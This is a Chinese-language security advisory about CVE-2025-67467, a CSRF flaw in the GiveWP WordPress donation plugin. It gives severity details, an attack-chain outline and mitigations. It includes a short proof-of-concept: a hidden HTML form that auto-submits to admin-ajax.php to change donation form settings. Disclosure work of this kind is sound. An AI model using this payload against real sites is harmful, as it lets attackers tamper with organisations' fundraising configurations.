IPBUF安全漏洞报告
English
CVE-2025-67467 CVSS 5.4 中危

CVE-2025-67467 GiveWP插件跨站请求伪造(CSRF)漏洞

披露日期: 2025-12-09

漏洞信息

漏洞编号
CVE-2025-67467
漏洞类型
CSRF跨站请求伪造
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
StellarWP GiveWP

相关标签

CSRF跨站请求伪造GiveWPWordPress插件中危漏洞CVE-2025-67467StellarWP捐赠插件

漏洞概述

CVE-2025-67467是WordPress插件GiveWP中的一个中危跨站请求伪造(CSRF)漏洞。该漏洞存在于GiveWP插件4.13.1及以下版本中,由于插件在处理某些操作时缺乏有效的CSRF令牌验证,攻击者可以诱导已登录的管理员或用户执行非预期的操作。GiveWP是一款流行的WordPress捐赠和筹款插件,广泛应用于各类非营利组织和慈善机构的网站中。该漏洞的CVSS评分为5.4,属于中等严重程度,主要影响在于攻击者可以通过社工手段诱导用户点击恶意链接,从而在用户不知情的情况下执行捐赠相关的敏感操作,如修改捐款设置、创建或删除捐赠表单等。由于该漏洞不需要认证即可发起攻击,且攻击复杂度较低,因此建议用户尽快升级到最新版本以修复此安全问题。

技术细节

该CSRF漏洞存在于GiveWP插件的多个AJAX处理函数中。攻击者可以通过构造恶意HTML页面或链接,诱导已登录的WordPress管理员或GiveWP用户访问。当用户访问攻击者精心设计的页面时,浏览器会自动向目标网站的相同域发送HTTP请求。由于浏览器会自动携带用户的会话Cookie,服务器会认为这是用户的合法操作请求。GiveWP插件在处理这些请求时未正确实现CSRF令牌验证机制,导致攻击者可以绕过身份验证执行管理员操作。攻击者可能利用此漏洞执行以下操作:1) 修改捐赠表单配置;2) 创建新的捐赠活动;3) 更改支付网关设置;4) 导出捐赠者数据等。攻击成功的关键在于用户必须保持登录状态且访问了恶意链接。

攻击链分析

STEP 1
步骤1
攻击者创建恶意HTML页面,包含针对GiveWP插件的CSRF攻击载荷
STEP 2
步骤2
攻击者通过钓鱼邮件、社交媒体或恶意网站诱导目标用户访问该页面
STEP 3
步骤3
目标用户的浏览器自动向目标WordPress站点发送带有Cookie的HTTP POST请求
STEP 4
步骤4
服务器验证用户会话有效后,执行攻击者构造的非法操作
STEP 5
步骤5
攻击者成功在用户不知情的情况下修改GiveWP配置或执行敏感操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2025-67467 --> <!-- This PoC demonstrates a CSRF attack on GiveWP plugin --> <html> <body> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="give_update_form_settings" /> <input type="hidden" name="post_id" value="123" /> <input type="hidden" name="give_settings[form_title]" value="Malicious Form" /> <input type="hidden" name="give_settings[donation_button_text]" value="Donate Now" /> <input type="hidden" name="give_settings[price_option]" value="custom" /> <input type="hidden" name="_wpnonce" value="" /> </form> <script> document.getElementById('csrfForm').submit(); </script> </body> </html>

影响范围

GiveWP <= 4.13.1

防御指南

临时缓解措施
作为临时缓解措施,可以禁用或限制未授权用户访问WordPress管理员后台,确保只有可信用户才能访问。同时可以考虑使用WordPress安全插件如Wordfence或Sucuri来提供额外的CSRF保护层。在等待官方补丁期间,应加强对管理员账户的安全监控,警惕异常的捐赠配置变更。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表